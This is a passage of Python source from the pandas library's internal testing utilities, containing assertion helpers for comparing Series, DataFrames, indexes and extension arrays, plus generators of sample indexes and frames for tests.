diff = np.sum((left.values != right.values).astype(int)) * 100.0 / len(left)
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
else:
_testing.assert_almost_equal(
left.values,
right.values,
check_less_precise=check_less_precise,
check_dtype=exact,
obj=obj,
lobj=left,
robj=right,
)
# metadata comparison
if check_names:
assert_attr_equal("names", left, right, obj=obj)
if isinstance(left, pd.PeriodIndex) or isinstance(right, pd.PeriodIndex):
assert_attr_equal("freq", left, right, obj=obj)
if isinstance(left, pd.IntervalIndex) or isinstance(right, pd.IntervalIndex):
assert_interval_array_equal(left.values, right.values)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
def assert_class_equal(left, right, exact: Union[bool, str] = True, obj="Input"):
"""
Checks classes are equal.
"""
__tracebackhide__ = True
def repr_class(x):
if isinstance(x, Index):
# return Index as it is to include values in the error message
return x
try:
return type(x).__name__
except AttributeError:
return repr(type(x))
if exact == "equiv":
if type(left) != type(right):
# allow equivalence of Int64Index/RangeIndex
types = {type(left).__name__, type(right).__name__}
if len(types - {"Int64Index", "RangeIndex"}):
msg = f"{obj} classes are not equivalent"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
elif exact:
if type(left) != type(right):
msg = f"{obj} classes are different"
raise_assert_detail(obj, msg, repr_class(left), repr_class(right))
def assert_attr_equal(attr, left, right, obj="Attributes"):
"""checks attributes are equal. Both objects must have attribute.
Parameters
----------
attr : str
Attribute name being compared.
left : object
right : object
obj : str, default 'Attributes'
Specify object name being compared, internally used to show appropriate
assertion message
"""
__tracebackhide__ = True
left_attr = getattr(left, attr)
right_attr = getattr(right, attr)
if left_attr is right_attr:
return True
elif (
is_number(left_attr)
and np.isnan(left_attr)
and is_number(right_attr)
and np.isnan(right_attr)
):
# np.nan
return True
try:
result = left_attr == right_attr
except TypeError:
# datetimetz on rhs may raise TypeError
result = False
if not isinstance(result, bool):
result = result.all()
if result:
return True
else:
msg = f'Attribute "{attr}" are different'
raise_assert_detail(obj, msg, left_attr, right_attr)
def assert_is_valid_plot_return_object(objs):
import matplotlib.pyplot as plt
if isinstance(objs, (pd.Series, np.ndarray)):
for el in objs.ravel():
msg = (
"one of 'objs' is not a matplotlib Axes instance, "
f"type encountered {repr(type(el).__name__)}"
)
assert isinstance(el, (plt.Axes, dict)), msg
else:
msg = (
"objs is neither an ndarray of Artist instances nor a single "
"ArtistArtist instance, tuple, or dict, 'objs' is a "
f"{repr(type(objs).__name__)}"
)
assert isinstance(objs, (plt.Artist, tuple, dict)), msg
def isiterable(obj):
return hasattr(obj, "__iter__")
def assert_is_sorted(seq):
"""Assert that the sequence is sorted."""
if isinstance(seq, (Index, Series)):
seq = seq.values
# sorting does not change precisions
assert_numpy_array_equal(seq, np.sort(np.array(seq)))
def assert_categorical_equal(
left, right, check_dtype=True, check_category_order=True, obj="Categorical"
):
"""Test that Categoricals are equivalent.
Parameters
----------
left : Categorical
right : Categorical
check_dtype : bool, default True
Check that integer dtype of the codes are the same
check_category_order : bool, default True
Whether the order of the categories should be compared, which
implies identical integer codes. If False, only the resulting
values are compared. The ordered attribute is
checked regardless.
obj : str, default 'Categorical'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, Categorical)
if check_category_order:
assert_index_equal(left.categories, right.categories, obj=f"{obj}.categories")
assert_numpy_array_equal(
left.codes, right.codes, check_dtype=check_dtype, obj=f"{obj}.codes",
)
else:
assert_index_equal(
left.categories.sort_values(),
right.categories.sort_values(),
obj=f"{obj}.categories",
)
assert_index_equal(
left.categories.take(left.codes),
right.categories.take(right.codes),
obj=f"{obj}.values",
)
assert_attr_equal("ordered", left, right, obj=obj)
def assert_interval_array_equal(left, right, exact="equiv", obj="IntervalArray"):
"""Test that two IntervalArrays are equivalent.
Parameters
----------
left, right : IntervalArray
The IntervalArrays to compare.
exact : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical. If 'equiv', then RangeIndex can be substituted for
Int64Index as well.
obj : str, default 'IntervalArray'
Specify object name being compared, internally used to show appropriate
assertion message
"""
_check_isinstance(left, right, IntervalArray)
assert_index_equal(left.left, right.left, exact=exact, obj=f"{obj}.left")
assert_index_equal(left.right, right.right, exact=exact, obj=f"{obj}.left")
assert_attr_equal("closed", left, right, obj=obj)
def assert_period_array_equal(left, right, obj="PeriodArray"):
_check_isinstance(left, right, PeriodArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}.values")
assert_attr_equal("freq", left, right, obj=obj)
def assert_datetime_array_equal(left, right, obj="DatetimeArray"):
__tracebackhide__ = True
_check_isinstance(left, right, DatetimeArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
assert_attr_equal("tz", left, right, obj=obj)
def assert_timedelta_array_equal(left, right, obj="TimedeltaArray"):
__tracebackhide__ = True
_check_isinstance(left, right, TimedeltaArray)
assert_numpy_array_equal(left._data, right._data, obj=f"{obj}._data")
assert_attr_equal("freq", left, right, obj=obj)
def raise_assert_detail(obj, message, left, right, diff=None):
__tracebackhide__ = True
if isinstance(left, np.ndarray):
left = pprint_thing(left)
elif is_categorical_dtype(left):
left = repr(left)
if isinstance(right, np.ndarray):
right = pprint_thing(right)
elif is_categorical_dtype(right):
right = repr(right)
msg = f"""{obj} are different
{message}
[left]: {left}
[right]: {right}"""
if diff is not None:
msg += f"\n[diff]: {diff}"
raise AssertionError(msg)
def assert_numpy_array_equal(
left,
right,
strict_nan=False,
check_dtype=True,
err_msg=None,
check_same=None,
obj="numpy array",
):
"""
Check that 'np.ndarray' is equivalent.
Parameters
----------
left, right : numpy.ndarray or iterable
The two arrays to be compared.
strict_nan : bool, default False
If True, consider NaN and None to be different.
check_dtype : bool, default True
Check dtype if both a and b are np.ndarray.
err_msg : str, default None
If provided, used as assertion message.
check_same : None|'copy'|'same', default None
Ensure left and right refer/do not refer to the same memory area.
obj : str, default 'numpy array'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
# Show a detailed error message when classes are different
assert_class_equal(left, right, obj=obj)
# both classes must be an np.ndarray
_check_isinstance(left, right, np.ndarray)
def _get_base(obj):
return obj.base if getattr(obj, "base", None) is not None else obj
left_base = _get_base(left)
right_base = _get_base(right)
if check_same == "same":
if left_base is not right_base:
raise AssertionError(f"{repr(left_base)} is not {repr(right_base)}")
elif check_same == "copy":
if left_base is right_base:
raise AssertionError(f"{repr(left_base)} is {repr(right_base)}")
def _raise(left, right, err_msg):
if err_msg is None:
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shapes are different", left.shape, right.shape,
)
diff = 0
for l, r in zip(left, right):
# count up differences
if not array_equivalent(l, r, strict_nan=strict_nan):
diff += 1
diff = diff * 100.0 / left.size
msg = f"{obj} values are different ({np.round(diff, 5)} %)"
raise_assert_detail(obj, msg, left, right)
raise AssertionError(err_msg)
# compare shape and values
if not array_equivalent(left, right, strict_nan=strict_nan):
_raise(left, right, err_msg)
if check_dtype:
if isinstance(left, np.ndarray) and isinstance(right, np.ndarray):
assert_attr_equal("dtype", left, right, obj=obj)
def assert_extension_array_equal(
left, right, check_dtype=True, check_less_precise=False, check_exact=False
):
"""Check that left and right ExtensionArrays are equal.
Parameters
----------
left, right : ExtensionArray
The two arrays to compare
check_dtype : bool, default True
Whether to check if the ExtensionArray dtypes are identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
check_exact : bool, default False
Whether to compare number exactly.
Notes
-----
Missing values are checked separately from valid values.
A mask of missing values is computed for each and checked to match.
The remaining all-valid values are cast to object dtype and checked.
"""
assert isinstance(left, ExtensionArray), "left is not an ExtensionArray"
assert isinstance(right, ExtensionArray), "right is not an ExtensionArray"
if check_dtype:
assert_attr_equal("dtype", left, right, obj="ExtensionArray")
if hasattr(left, "asi8") and type(right) == type(left):
# Avoid slow object-dtype comparisons
assert_numpy_array_equal(left.asi8, right.asi8)
return
left_na = np.asarray(left.isna())
right_na = np.asarray(right.isna())
assert_numpy_array_equal(left_na, right_na, obj="ExtensionArray NA mask")
left_valid = np.asarray(left[~left_na].astype(object))
right_valid = np.asarray(right[~right_na].astype(object))
if check_exact:
assert_numpy_array_equal(left_valid, right_valid, obj="ExtensionArray")
else:
_testing.assert_almost_equal(
left_valid,
right_valid,
check_dtype=check_dtype,
check_less_precise=check_less_precise,
obj="ExtensionArray",
)
# This could be refactored to use the NDFrame.equals method
def assert_series_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_series_type=True,
check_less_precise=False,
check_names=True,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
obj="Series",
):
"""
Check that left and right Series are equal.
Parameters
----------
left : Series
right : Series
check_dtype : bool, default True
Whether to check the Series dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_series_type : bool, default True
Whether to check the Series class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check the Series and Index names attribute.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
obj : str, default 'Series'
Specify object name being compared, internally used to show appropriate
assertion message.
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, Series)
if check_series_type:
# ToDo: There are some tests using rhs is sparse
# lhs is dense. Should use assert_class_equal in future
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# length comparison
if len(left) != len(right):
msg1 = f"{len(left)}, {left.index}"
msg2 = f"{len(right)}, {right.index}"
raise_assert_detail(obj, "Series length are different", msg1, msg2)
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
if check_dtype:
# We want to skip exact dtype checking when `check_categorical`
# is False. We'll still raise if only one is a `Categorical`,
# regardless of `check_categorical`
if (
is_categorical_dtype(left)
and is_categorical_dtype(right)
and not check_categorical
):
pass
else:
assert_attr_equal("dtype", left, right, obj=f"Attributes of {obj}")
if check_exact:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
obj=str(obj),
)
elif check_datetimelike_compat:
# we want to check only if we have compat dtypes
# e.g. integer and M|m are NOT compat, but we can simply check
# the values in that case
if needs_i8_conversion(left) or needs_i8_conversion(right):
# datetimelike may have different objects (e.g. datetime.datetime
# vs Timestamp) but will compare equal
if not Index(left.values).equals(Index(right.values)):
msg = (
f"[datetimelike_compat=True] {left.values} "
f"is not equal to {right.values}."
)
raise AssertionError(msg)
else:
assert_numpy_array_equal(
left._internal_get_values(),
right._internal_get_values(),
check_dtype=check_dtype,
)
elif is_interval_dtype(left) or is_interval_dtype(right):
assert_interval_array_equal(left.array, right.array)
elif is_extension_array_dtype(left.dtype) and is_datetime64tz_dtype(left.dtype):
# .values is an ndarray, but ._values is the ExtensionArray.
# TODO: Use .array
assert is_extension_array_dtype(right.dtype)
assert_extension_array_equal(left._values, right._values)
elif (
is_extension_array_dtype(left)
and not is_categorical_dtype(left)
and is_extension_array_dtype(right)
and not is_categorical_dtype(right)
):
assert_extension_array_equal(left.array, right.array)
else:
_testing.assert_almost_equal(
left._internal_get_values(),
right._internal_get_values(),
check_less_precise=check_less_precise,
check_dtype=check_dtype,
obj=str(obj),
)
# metadata comparison
if check_names:
assert_attr_equal("name", left, right, obj=obj)
if check_categorical:
if is_categorical_dtype(left) or is_categorical_dtype(right):
assert_categorical_equal(left.values, right.values, obj=f"{obj} category")
# This could be refactored to use the NDFrame.equals method
def assert_frame_equal(
left,
right,
check_dtype=True,
check_index_type="equiv",
check_column_type="equiv",
check_frame_type=True,
check_less_precise=False,
check_names=True,
by_blocks=False,
check_exact=False,
check_datetimelike_compat=False,
check_categorical=True,
check_like=False,
obj="DataFrame",
):
"""
Check that left and right DataFrame are equal.
This function is intended to compare two DataFrames and output any
differences. Is is mostly intended for use in unit tests.
Additional parameters allow varying the strictness of the
equality checks performed.
Parameters
----------
left : DataFrame
First DataFrame to compare.
right : DataFrame
Second DataFrame to compare.
check_dtype : bool, default True
Whether to check the DataFrame dtype is identical.
check_index_type : bool or {'equiv'}, default 'equiv'
Whether to check the Index class, dtype and inferred_type
are identical.
check_column_type : bool or {'equiv'}, default 'equiv'
Whether to check the columns class, dtype and inferred_type
are identical. Is passed as the ``exact`` argument of
:func:`assert_index_equal`.
check_frame_type : bool, default True
Whether to check the DataFrame class is identical.
check_less_precise : bool or int, default False
Specify comparison precision. Only used when check_exact is False.
5 digits (False) or 3 digits (True) after decimal points are compared.
If int, then specify the digits to compare.
When comparing two numbers, if the first number has magnitude less
than 1e-5, we compare the two numbers directly and check whether
they are equivalent within the specified precision. Otherwise, we
compare the **ratio** of the second number to the first number and
check whether it is equivalent to 1 within the specified precision.
check_names : bool, default True
Whether to check that the `names` attribute for both the `index`
and `column` attributes of the DataFrame is identical.
by_blocks : bool, default False
Specify how to compare internal data. If False, compare by columns.
If True, compare by blocks.
check_exact : bool, default False
Whether to compare number exactly.
check_datetimelike_compat : bool, default False
Compare datetime-like which is comparable ignoring dtype.
check_categorical : bool, default True
Whether to compare internal Categorical exactly.
check_like : bool, default False
If True, ignore the order of index & columns.
Note: index labels must match their respective rows
(same as in columns) - same labels must be with the same data.
obj : str, default 'DataFrame'
Specify object name being compared, internally used to show appropriate
assertion message.
See Also
--------
assert_series_equal : Equivalent method for asserting Series equality.
DataFrame.equals : Check DataFrame equality.
Examples
--------
This example shows comparing two DataFrames that are equal
but with columns of differing dtypes.
>>> from pandas._testing import assert_frame_equal
>>> df1 = pd.DataFrame({'a': [1, 2], 'b': [3, 4]})
>>> df2 = pd.DataFrame({'a': [1, 2], 'b': [3.0, 4.0]})
df1 equals itself.
>>> assert_frame_equal(df1, df1)
df1 differs from df2 as column 'b' is of a different type.
>>> assert_frame_equal(df1, df2)
Traceback (most recent call last):
...
AssertionError: Attributes of DataFrame.iloc[:, 1] (column name="b") are different
Attribute "dtype" are different
[left]: int64
[right]: float64
Ignore differing dtypes in columns with check_dtype.
>>> assert_frame_equal(df1, df2, check_dtype=False)
"""
__tracebackhide__ = True
# instance validation
_check_isinstance(left, right, DataFrame)
if check_frame_type:
assert isinstance(left, type(right))
# assert_class_equal(left, right, obj=obj)
# shape comparison
if left.shape != right.shape:
raise_assert_detail(
obj, f"{obj} shape mismatch", f"{repr(left.shape)}", f"{repr(right.shape)}",
)
if check_like:
left, right = left.reindex_like(right), right
# index comparison
assert_index_equal(
left.index,
right.index,
exact=check_index_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.index",
)
# column comparison
assert_index_equal(
left.columns,
right.columns,
exact=check_column_type,
check_names=check_names,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_categorical=check_categorical,
obj=f"{obj}.columns",
)
# compare by blocks
if by_blocks:
rblocks = right._to_dict_of_blocks()
lblocks = left._to_dict_of_blocks()
for dtype in list(set(list(lblocks.keys()) + list(rblocks.keys()))):
assert dtype in lblocks
assert dtype in rblocks
assert_frame_equal(
lblocks[dtype], rblocks[dtype], check_dtype=check_dtype, obj=obj
)
# compare by columns
else:
for i, col in enumerate(left.columns):
assert col in right
lcol = left.iloc[:, i]
rcol = right.iloc[:, i]
assert_series_equal(
lcol,
rcol,
check_dtype=check_dtype,
check_index_type=check_index_type,
check_less_precise=check_less_precise,
check_exact=check_exact,
check_names=check_names,
check_datetimelike_compat=check_datetimelike_compat,
check_categorical=check_categorical,
obj=f'{obj}.iloc[:, {i}] (column name="{col}")',
)
def assert_equal(left, right, **kwargs):
"""
Wrapper for tm.assert_*_equal to dispatch to the appropriate test function.
Parameters
----------
left, right : Index, Series, DataFrame, ExtensionArray, or np.ndarray
The two items to be compared.
**kwargs
All keyword arguments are passed through to the underlying assert method.
"""
__tracebackhide__ = True
if isinstance(left, pd.Index):
assert_index_equal(left, right, **kwargs)
elif isinstance(left, pd.Series):
assert_series_equal(left, right, **kwargs)
elif isinstance(left, pd.DataFrame):
assert_frame_equal(left, right, **kwargs)
elif isinstance(left, IntervalArray):
assert_interval_array_equal(left, right, **kwargs)
elif isinstance(left, PeriodArray):
assert_period_array_equal(left, right, **kwargs)
elif isinstance(left, DatetimeArray):
assert_datetime_array_equal(left, right, **kwargs)
elif isinstance(left, TimedeltaArray):
assert_timedelta_array_equal(left, right, **kwargs)
elif isinstance(left, ExtensionArray):
assert_extension_array_equal(left, right, **kwargs)
elif isinstance(left, np.ndarray):
assert_numpy_array_equal(left, right, **kwargs)
elif isinstance(left, str):
assert kwargs == {}
assert left == right
else:
raise NotImplementedError(type(left))
def box_expected(expected, box_cls, transpose=True):
"""
Helper function to wrap the expected output of a test in a given box_class.
Parameters
----------
expected : np.ndarray, Index, Series
box_cls : {Index, Series, DataFrame}
Returns
-------
subclass of box_cls
"""
if box_cls is pd.Index:
expected = pd.Index(expected)
elif box_cls is pd.Series:
expected = pd.Series(expected)
elif box_cls is pd.DataFrame:
expected = pd.Series(expected).to_frame()
if transpose:
# for vector operations, we we need a DataFrame to be a single-row,
# not a single-column, in order to operate against non-DataFrame
# vectors of the same length.
expected = expected.T
elif box_cls is PeriodArray:
# the PeriodArray constructor is not as flexible as period_array
expected = period_array(expected)
elif box_cls is DatetimeArray:
expected = DatetimeArray(expected)
elif box_cls is TimedeltaArray:
expected = TimedeltaArray(expected)
elif box_cls is np.ndarray:
expected = np.array(expected)
elif box_cls is to_array:
expected = to_array(expected)
else:
raise NotImplementedError(box_cls)
return expected
def to_array(obj):
# temporary implementation until we get pd.array in place
if is_period_dtype(obj):
return period_array(obj)
elif is_datetime64_dtype(obj) or is_datetime64tz_dtype(obj):
return DatetimeArray._from_sequence(obj)
elif is_timedelta64_dtype(obj):
return TimedeltaArray._from_sequence(obj)
else:
return np.array(obj)
# -----------------------------------------------------------------------------
# Sparse
def assert_sp_array_equal(
left,
right,
check_dtype=True,
check_kind=True,
check_fill_value=True,
consolidate_block_indices=False,
):
"""Check that the left and right SparseArray are equal.
Parameters
----------
left : SparseArray
right : SparseArray
check_dtype : bool, default True
Whether to check the data dtype is identical.
check_kind : bool, default True
Whether to just the kind of the sparse index for each column.
check_fill_value : bool, default True
Whether to check that left.fill_value matches right.fill_value
consolidate_block_indices : bool, default False
Whether to consolidate contiguous blocks for sparse arrays with
a BlockIndex. Some operations, e.g. concat, will end up with
block indices that could be consolidated. Setting this to true will
create a new BlockIndex for that array, with consolidated
block indices.
"""
_check_isinstance(left, right, pd.arrays.SparseArray)
assert_numpy_array_equal(left.sp_values, right.sp_values, check_dtype=check_dtype)
# SparseIndex comparison
assert isinstance(left.sp_index, pd._libs.sparse.SparseIndex)
assert isinstance(right.sp_index, pd._libs.sparse.SparseIndex)
if not check_kind:
left_index = left.sp_index.to_block_index()
right_index = right.sp_index.to_block_index()
else:
left_index = left.sp_index
right_index = right.sp_index
if consolidate_block_indices and left.kind == "block":
# we'll probably remove this hack...
left_index = left_index.to_int_index().to_block_index()
right_index = right_index.to_int_index().to_block_index()
if not left_index.equals(right_index):
raise_assert_detail(
"SparseArray.index", "index are not equal", left_index, right_index
)
else:
# Just ensure a
pass
if check_fill_value:
assert_attr_equal("fill_value", left, right)
if check_dtype:
assert_attr_equal("dtype", left, right)
assert_numpy_array_equal(left.to_dense(), right.to_dense(), check_dtype=check_dtype)
# -----------------------------------------------------------------------------
# Others
def assert_contains_all(iterable, dic):
for k in iterable:
assert k in dic, f"Did not contain item: {repr(k)}"
def assert_copy(iter1, iter2, **eql_kwargs):
"""
iter1, iter2: iterables that produce elements
comparable with assert_almost_equal
Checks that the elements are equal, but not
the same object. (Does not check that items
in sequences are also not the same object)
"""
for elem1, elem2 in zip(iter1, iter2):
assert_almost_equal(elem1, elem2, **eql_kwargs)
msg = (
f"Expected object {repr(type(elem1))} and object {repr(type(elem2))} to be "
"different objects, but they were the same object."
)
assert elem1 is not elem2, msg
def getCols(k):
return string.ascii_uppercase[:k]
# make index
def makeStringIndex(k=10, name=None):
return Index(rands_array(nchars=10, size=k), name=name)
def makeUnicodeIndex(k=10, name=None):
return Index(randu_array(nchars=10, size=k), name=name)
def makeCategoricalIndex(k=10, n=3, name=None, **kwargs):
""" make a length k index or n categories """
x = rands_array(nchars=4, size=n)
return CategoricalIndex(
Categorical.from_codes(np.arange(k) % n, categories=x), name=name, **kwargs
)
def makeIntervalIndex(k=10, name=None, **kwargs):
""" make a length k IntervalIndex """
x = np.linspace(0, 100, num=(k + 1))
return IntervalIndex.from_breaks(x, name=name, **kwargs)
def makeBoolIndex(k=10, name=None):
if k == 1:
return Index([True], name=name)
elif k == 2:
return Index([False, True], name=name)
return Index([False, True] + [False] * (k - 2), name=name)
def makeIntIndex(k=10, name=None):
return Index(list(range(k)), name=name)
def makeUIntIndex(k=10, name=None):
return Index([2 ** 63 + i for i in range(k)], name=name)
def makeRangeIndex(k=10, name=None, **kwargs):
return RangeIndex(0, k, 1, name=name, **kwargs)
def makeFloatIndex(k=10, name=None):
values = sorted(np.random.random_sample(k)) - np.random.random_sample(1)
return Index(values * (10 ** np.random.randint(0, 9)), name=name)
def makeDateIndex(k=10, freq="B", name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = bdate_range(dt, periods=k, freq=freq, name=name)
return DatetimeIndex(dr, name=name, **kwargs)
def makeTimedeltaIndex(k=10, freq="D", name=None, **kwargs):
return pd.timedelta_range(start="1 day", periods=k, freq=freq, name=name, **kwargs)
def makePeriodIndex(k=10, name=None, **kwargs):
dt = datetime(2000, 1, 1)
dr = pd.period_range(start=dt, periods=k, freq="B", name=name, **kwargs)
return dr
def makeMultiIndex(k=10, names=None, **kwargs):
return MultiIndex.from_product((("foo", "bar"), (1, 2)), names=names, **kwargs)
_names = [
"Alice",
"Bob",
"Charlie",
"Dan",
"Edith",
"Frank",
"George",
"Hannah",
"Ingrid",
"Jerry",
"Kevin",
"Laura",
"Michael",
"Norbert",
"Oliver",
"Patricia",
"Quinn",
"Ray",
"Sarah",
"Tim",
"Ursula",
"Victor",
"Wendy",
"Xavier",
"Yvonne",
"Zelda",
]
def _make_timeseries(start="2000-01-01", end="2000-12-31", freq="1D", seed=None):
"""
Make a DataFrame with a DatetimeIndex
Parameters
----------
start : str or Timestamp, default "2000-01-01"
The start of the index. Passed to date_range with `freq`.
end : str or Timestamp, default "2000-12-31"
The end of the index. Passed to date_range with `freq`.
freq : str or Freq
The frequency to use for the DatetimeIndex
seed : int, optional
The random state seed.
* name : object dtype with string names
* id : int dtype with
* x, y : float dtype
Examples
--------
>>> _make_timeseries()
id name x y
timestamp
2000-01-01 982 Frank 0.031261 0.986727
2000-01-02 1025 Edith -0.086358 -0.032920
2000-01-03 982 Edith 0.473177 0.298654
2000-01-04 1009 Sarah 0.534344 -0.750377
2000-01-05 963 Zelda -0.271573 0.054424
... ... ... ... ...
2000-12-27 980 Ingrid -0.132333 -0.422195
2000-12-28 972 Frank -0.376007 -0.298687
2000-12-29 1009 Ursula -0.865047 -0.503133
2000-12-30 1000 Hannah -0.063757 -0.507336
2000-12-31 972 Tim -0.869120 0.531685
"""
index = pd.date_range(start=start, end=end, freq=freq, name="timestamp")
n = len(index)
state = np.random.RandomState(seed)
columns = {
"name": state.choice(_names, size=n),
"id": state.poisson(1000, size=n),
"x": state.rand(n) * 2 - 1,
"y": state.rand(n) * 2 - 1,
}
df = pd.DataFrame(columns, index=index, columns=sorted(columns))
if df.index[-1] == end:
df = df.iloc[:-1]
return df
def all_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the various
index classes.
Parameters
----------
k: length of each of the index instances
"""
all_make_index_funcs = [
makeIntIndex,
makeFloatIndex,
makeStringIndex,
makeUnicodeIndex,
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeBoolIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
]
for make_index_func in all_make_index_funcs:
yield make_index_func(k=k)
def index_subclass_makers_generator():
make_index_funcs = [
makeDateIndex,
makePeriodIndex,
makeTimedeltaIndex,
makeRangeIndex,
makeIntervalIndex,
makeCategoricalIndex,
makeMultiIndex,
]
for make_index_func in make_index_funcs:
yield make_index_func
def all_timeseries_index_generator(k=10):
"""Generator which can be iterated over to get instances of all the classes
which represent time-series.
Parameters
----------
k: length of each of the index instances
"""
make_index_funcs = [makeDateIndex, makePeriodIndex, makeTimedeltaIndex]
for make_index_func in make_index_funcs:
yield make_index_func(k=k)
# make series
def makeFloatSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeStringSeries(name=None):
index = makeStringIndex(N)
return Series(randn(N), index=index, name=name)
def makeObjectSeries(name=None):
data = makeStringIndex(N)
data = Index(data, dtype=object)
index = makeStringIndex(N)
return Series(data, index=index, name=name)
def getSeriesData():
index = makeStringIndex(N)
return {c: Series(randn(N), index=index) for c in getCols(K)}
def makeTimeSeries(nper=None, freq="B", name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makeDateIndex(nper, freq=freq), name=name)
def makePeriodSeries(nper=None, name=None):
if nper is None:
nper = N
return Series(randn(nper), index=makePeriodIndex(nper), name=name)
def getTimeSeriesData(nper=None, freq="B"):
return {c: makeTimeSeries(nper, freq) for c in getCols(K)}
def getPeriodData(nper=None):
return {c: makePeriodSeries(nper) for c in getCols(K)}
# make frame
def makeTimeDataFrame(nper=None, freq="B"):
data = getTimeSeriesData(nper, freq)
return DataFrame(data)
def makeDataFrame():
data = getSeriesData()
return DataFrame(data)
def getMixedTypeDict():
index = Index(["a", "b", "c", "d", "e"])
data = {
"A": [0.0, 1.0, 2.0, 3.0, 4.0],
"B": [0.0, 1.0, 0.0, 1.0, 0.0],
"C": ["foo1", "foo2", "foo3", "foo4", "foo5"],
"D": bdate_range("1/1/2009", periods=5),
}
return index, data
def makeMixedDataFrame():
return DataFrame(getMixedTypeDict()[1])
def makePeriodFrame(nper=None):
data = getPeriodData(nper)
return DataFrame(data)
def makeCustomIndex(
nentries, nlevels, prefix="#", names=False, ndupe_l=None, idx_type=None
):
"""Create an index/multindex with given dimensions, levels, names, etc'
nentries - number of entries in index
nlevels - number of levels (> 1 produces multindex)
prefix - a string prefix for labels
names - (Optional), bool or list of strings. if True will use default
names, if false will use no names, if a list is given, the name of
each level in the index will be taken from the list.
ndupe_l - (Optional), list of ints, the number of rows for which the
label will repeated at the corresponding level, you can specify just
the first few, the rest will use the default ndupe_l of 1.
len(ndupe_l) <= nlevels.
idx_type - "i"/"f"/"s"/"u"/"dt"/"p"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a datetime index.
if unspecified, string labels will be generated.
"""
if ndupe_l is None:
ndupe_l = [1] * nlevels
assert is_sequence(ndupe_l) and len(ndupe_l) <= nlevels
assert names is None or names is False or names is True or len(names) is nlevels
assert idx_type is None or (
idx_type in ("i", "f", "s", "u", "dt", "p", "td") and nlevels == 1
)
if names is True:
# build default names
names = [prefix + str(i) for i in range(nlevels)]
if names is False:
# pass None to index constructor for no name
names = None
# make singleton case uniform
if isinstance(names, str) and nlevels == 1:
names = [names]
# specific 1D index type requested?
idx_func = dict(
i=makeIntIndex,
f=makeFloatIndex,
s=makeStringIndex,
u=makeUnicodeIndex,
dt=makeDateIndex,
td=makeTimedeltaIndex,
p=makePeriodIndex,
).get(idx_type)
if idx_func:
idx = idx_func(nentries)
# but we need to fill in the name
if names:
idx.name = names[0]
return idx
elif idx_type is not None:
raise ValueError(
f"{repr(idx_type)} is not a legal value for `idx_type`, "
"use 'i'/'f'/'s'/'u'/'dt'/'p'/'td'."
)
if len(ndupe_l) < nlevels:
ndupe_l.extend([1] * (nlevels - len(ndupe_l)))
assert len(ndupe_l) == nlevels
assert all(x > 0 for x in ndupe_l)
tuples = []
for i in range(nlevels):
def keyfunc(x):
import re
numeric_tuple = re.sub(r"[^\d_]_?", "", x).split("_")
return [int(num) for num in numeric_tuple]
# build a list of lists to create the index from
div_factor = nentries // ndupe_l[i] + 1
cnt = Counter()
for j in range(div_factor):
label = f"{prefix}_l{i}_g{j}"
cnt[label] = ndupe_l[i]
# cute Counter trick
result = sorted(cnt.elements(), key=keyfunc)[:nentries]
tuples.append(result)
tuples = list(zip(*tuples))
# convert tuples to index
if nentries == 1:
# we have a single level of tuples, i.e. a regular Index
index = Index(tuples[0], name=names[0])
elif nlevels == 1:
name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
